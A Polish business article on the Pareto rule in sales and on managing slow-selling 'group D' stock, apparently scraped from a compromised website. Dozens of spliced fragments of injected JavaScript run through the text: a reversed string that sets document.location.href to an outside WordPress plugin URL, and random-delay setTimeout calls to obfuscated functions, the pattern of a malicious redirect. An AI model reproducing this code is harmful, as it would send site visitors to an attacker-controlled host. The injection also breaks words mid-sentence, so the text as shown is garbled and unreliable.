W sprzedaży rządzi Reguła Pare toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, zwana też Regułą 80/20, gdzie 20% produktów jest odpowiedzialna za 80% sprzedaży. Oczywiście trzeba zrobić dwa zastrzeżenia. Co toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do zasady, ta reguła wcale nie rządzi. Ona tylko ilustruje mechanizmy, jakie mają miejsce w sprzedaży. A po drugie, jest jej niezbędna statystyka.
Grupy Sprzedażowe
Tak zwykle wygląda sprzedaż. Formuje się czołówka, gdzie A + B toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to 20% najlepiej sprzedających się produktów (A toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to najlepsze 5%). Dalej C, gdzie 80% aktywnych SKU odpowiada za 20% sprzedaży. Jest jeszcze Grupa D, która się wprawdzie nie sprzedaje zupełnie, ale jest i się kurzy.
D ma wady, ale i ma zalety
Większość firm jest światoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doma takiego podziału i w efekcie stara się wyeliminować Grupę D. Nikt jej nie lubi, leży i nie ma z niej sprzedaży.
A gdyby D nie było?
W eliminowaniu Grupy D mało firm odnosi prawdziwy sukces. Dlatego też może nie zastanawia się, co by było, gdyby się jednak udało. Otóż nic. A nawet wiele złego. Jeśli Grupa D powstaje światoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domie (a może bardziej ze światoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domością, bo światoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to chyba nikt jej nie tworzy), toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to ma jedna niewątpliwą zaletę. Ma mało zapasu. A toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to idealne rozwiązanie, gdyż jest, a jakoby jej nie było. Jeśli jednak uda się ją wyeliminować, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zastąpi ją część Grupy C. Już ze stanami właściwymi dla C, czyli znacznie wyższymi niż te z D. Dalej nie będzie się sprzedawało, a będzie drożej.
Powody powstawania D
Są jak najbardziej racjonalne i związane z procesem sprzedaży i charakterem klienta. Można się jednak obejść bez tej wiedzy, wystarczy tylko zas toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosować w praktyce jej konsekwencje. Czyli zmniejszyć stany na D, najlepiej gdy jest jeszcze C.
Uwaga. „skąd bierze się D?” Z zachowania klienta. Tu związek jest jak najbardziej przyczynowo – skutkowy, ale na szczęście w kategoryzacji na Grupy Sprzedażowe (A/B/C/D) nie trzeba tego uwzględniać. Dlaczego na szczęście? Gdyż tu każdy może mieć inne zdanie i raczej każdą tezę da się obronić. Jeśli k toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toś chce się zagłębiać w przyczyny, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to można np. powiedzieć, że cześć rzeczy jest lepszych, czyli reszta musi być gorsza. A wtedy ta gorsza, choć toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobra, ale jednak gorsza, zostanie. Część toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towaru stanie się przestarzała, bo zmieni się w międzyczasie moda. A część będzie trywialnie uszkodzona. To wszystko prawda. Ale można się obejść bez tej prawdy, po prostu zaakcep toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować, że D jest. I uczynić z tego faktu sukces, przez nie wyprzedawanie jej na siłę, z dużym kosztem. Ale pozostawienie w małej ilości.
D, tak samo zresztą jak każda Grupa Sprzedażowa jest pojęciem dynamicznym. Dlatego cały czas produkty migrują między Grupami, najczęściej jednak tylko w jedną stronę, w dół (choć zdarza się proces odwrotny). I dlatego w D ciągle trzeba robić miejsce dla nowych, przez powolny proces wyprzedaży. To jednak oznacza, że D musi się stać co najmniej C, inaczej będzie na zawsze? Tak, wystarczy odkryć powody.
Typowy proces migracji między Grupami.
Bycie D ma zawsze swoją przyczynę
I war toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to ją odkryć, gdyż wtedy proces robienia miejsca na nowe D będzie prawie bezbolesny.
Proces pozbywania się D.
Jakie mogą być przyczyny bycia D? Różne. Niektóre tkwią w produkcie, niektóre w sprzedawcy, inne w o toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczeniu konkurencyjnym. Jednak zawsze jest jakiś powód i jego zrozumienie znacznie ułatwi pozbycie się kłopotu. A na pewno znacznie obniży jego koszt.
Powód | Rozwiązanie |
Za wysoka cena | Obniżyć. Utrzymanie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotychczasowej wcale nie ocali marży |
Zły stan techniczny | Przecenić. Albo naprawić |
Zmiana mody | Wyprzedać ze stratą. Na wystawie tylko będzie drażnić |
Przestarzały | To działa tak samo jak moda |
Podsumowanie
Sprzedaż nie jest jednolita. Niektóre produkty sprzedają się lepiej, niektóre gorzej. Tak już jest i lepiej toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zaakcep toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować. I zamienić z problemu w szanse. Ci, którzy się z tym pogodzą, zyskają na marży (zmniejszą koszty wyprzedaży) i na zapasie (nieunikniona Grupa D będzie tylko obecna, ale nie będzie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dominować).